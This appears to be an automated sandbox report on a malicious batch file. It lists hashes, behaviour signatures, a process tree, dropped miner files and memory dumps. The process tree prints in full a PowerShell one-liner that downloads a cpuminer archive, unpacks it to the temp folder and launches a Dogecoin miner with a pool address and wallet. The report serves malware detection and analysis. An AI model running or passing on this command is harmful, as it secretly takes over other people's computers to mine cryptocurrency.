b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1795s
max time network
1806s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
01/02/2024, 23:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	2172	powershell.exe
4	2172	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4620	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4620	cpuminer-sse2.exe
4620	cpuminer-sse2.exe
4620	cpuminer-sse2.exe
4620	cpuminer-sse2.exe
4620	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2172	powershell.exe
2172	powershell.exe
2172	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2172	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4936 wrote to memory of 2172	4936	cmd.exe	74
PID 4936 wrote to memory of 2172	4936	cmd.exe	74
PID 2172 wrote to memory of 3892	2172	powershell.exe	75
PID 2172 wrote to memory of 3892	2172	powershell.exe	75
PID 3892 wrote to memory of 4620	3892	cmd.exe	77
PID 3892 wrote to memory of 4620	3892	cmd.exe	77

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2172
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3892
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4620

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3znixchz.ui5.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.2MB

MD5
660d14eb3c292b36dcd9bf058e2c0430

SHA1
b552e1fe31d53cc1b030f2d8dd28da187166a2b4

SHA256
a3930e2a51876082e01ae4b03a5c7195cc94c1e23f3d70778b10565433ef4396

SHA512
75b03a830fc39e9fa0ec43ecab8bd49b0b1eefbc27ed612ae3f12a6cecc45e1e2ce3d1c581a0b0fe5c7b466865d8d40775884957ff0dc7970f6c1afda02421f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1005KB

MD5
57167ffdbf18357fa913a9f52f0ff4f8

SHA1
72f80689f5eafe73fe2054f52ab1592b0a8902bd

SHA256
01ea7111be5775ddf2d4d6c62393168e25fe389beba4adb0c8d285ac71360cf8

SHA512
daa2d4f6ea6cb98ff5152fda754862b4d927e883f046aec2ec46a67da9e06d91a5b7920d9caf18ac81971d3dfc925ecea1ef18ec9e7abae2b0a665356e97cdf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
668KB

MD5
85c2616d428b52f8c6ea1c95e7616f74

SHA1
09b10c96c22766b030aad0c09d375887cff73baa

SHA256
fdde7602f3db8aed301e636e92076732c18b60c0efcaa95214215fb5821e4606

SHA512
e39c0cabe7c06072256fb496cead20dde3e423a2d542cba7d1c985e32dfcd32af33b2a8f0283721f89712c7020242d478226dd564adb4207664e8745ac5c5f8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
644KB

MD5
0dc0d5332fb653828ee94648fa2b8073

SHA1
8bbac56ea7390f908961615748bf131f037c02dc

SHA256
b53852bc869bd2583854a2a133625891e39056988bd6c356e069b117b52bd88d

SHA512
72a4182b9235f6dcb2536f77a80d46ebb207f4fc0b50bb5dbf92e21f0f25fc5de80302cb6d40033619e308039b9b1d9813ff38b5acbdac94f9b54be255a90c8d

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
692KB

MD5
d1b635c9bca7eb2527ac7f8e05edb394

SHA1
78556805f7754e216c9bee6fa8cf1b479b218427

SHA256
ef71e3bb7e68c024ce9ba692a0e8259a62f7bb237fec0817ca5186133741aa27

SHA512
fda726dd8172dd55d92105840416227f18b5342054cd95e1e09744901b57bd68391fc28ce75c2f9647be6dab5097fd891127aec36565b63c2490c805d72fdf33

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
853KB

MD5
3d8671aa1701e511d45ffec439206bb9

SHA1
47453987837e114a08ac9fb042d56e0a6b8310c6

SHA256
a335fe3223730a0c5c2c1d8ef283269c285db5336614f31779e527cef822ba0b

SHA512
b96b1a5786ac522511576f2528276ea051bab1d7e6c2bbe6d1de5aaffd07c8a7b953746e1846ce4bb122a37a2258ef709c3b6f9961155d47605781b483ef14b2

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
600KB

MD5
e84745a3244c09e4e075828bf84ead2d

SHA1
fe66f8d90f5ad97c8b4d2c50c8c4cfb3c86dc1e9

SHA256
701ff0a36ef0d28523af4a1293686e04e6d563326b2ba61a08fb759d3da7dbfb

SHA512
dfe4992afd6e9e332ea7bdbf507585981e07e17b6020e74c3482c2b28aca9142a086b7333803140c6f97008adfdf79de6dcf7aaa01bbfd006d83c8e296de1eb9

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
617KB

MD5
8dddb2d69671e86d75d9775ac6459a20

SHA1
1a7b07fb8d0f5d68f9ff9a7445aa8cf07ccfd171

SHA256
5f2981393cb14174b4018a3a46cee8eb7944244dea55da80c272fe21c600a189

SHA512
9c740984fd11ceb791db28a39fd43d11a15cd551ee4495ecfe70fb49e8ce9dc2478d7d7144eb114c8c41bbcb5667b929fbeff5710f1a91c1ad89f0c2daae671a

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2172-31-0x000002D9F0DC0000-0x000002D9F0DD6000-memory.dmp

Filesize
88KB

Download
memory/2172-6-0x000002D9F0900000-0x000002D9F0922000-memory.dmp

Filesize
136KB

Download
memory/2172-36-0x000002D9F0A30000-0x000002D9F0A40000-memory.dmp

Filesize
64KB

Download
memory/2172-56-0x000002D9F0F60000-0x000002D9F0F72000-memory.dmp

Filesize
72KB

Download
memory/2172-69-0x000002D9F0A20000-0x000002D9F0A2A000-memory.dmp

Filesize
40KB

Download
memory/2172-112-0x000002D9F1000000-0x000002D9F10CC000-memory.dmp

Filesize
816KB

Download
memory/2172-33-0x000002D9F1000000-0x000002D9F10CC000-memory.dmp

Filesize
816KB

Download
memory/2172-4-0x000002D9F0930000-0x000002D9F09C2000-memory.dmp

Filesize
584KB

Download
memory/2172-28-0x000002D9F0A30000-0x000002D9F0A40000-memory.dmp

Filesize
64KB

Download
memory/2172-13-0x000002D9F0DE0000-0x000002D9F0E56000-memory.dmp

Filesize
472KB

Download
memory/2172-10-0x000002D9F0C50000-0x000002D9F0D5E000-memory.dmp

Filesize
1.1MB

Download
memory/2172-9-0x000002D9F0A30000-0x000002D9F0A40000-memory.dmp

Filesize
64KB

Download
memory/2172-8-0x000002D9F0A30000-0x000002D9F0A40000-memory.dmp

Filesize
64KB

Download
memory/2172-7-0x00007FF8D9500000-0x00007FF8D9EEC000-memory.dmp

Filesize
9.9MB

Download
memory/2172-117-0x00007FF8D9500000-0x00007FF8D9EEC000-memory.dmp

Filesize
9.9MB

Download
memory/2172-34-0x00007FF8D9500000-0x00007FF8D9EEC000-memory.dmp

Filesize
9.9MB

Download
memory/2172-5-0x000002D9F08C0000-0x000002D9F08D0000-memory.dmp

Filesize
64KB

Download
memory/4620-141-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4620-181-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4620-127-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4620-126-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4620-130-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4620-136-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4620-151-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4620-129-0x0000000061150000-0x00000000611E8000-memory.dmp

Filesize
608KB

Download
memory/4620-128-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4620-156-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4620-171-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4620-176-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4620-146-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4620-186-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download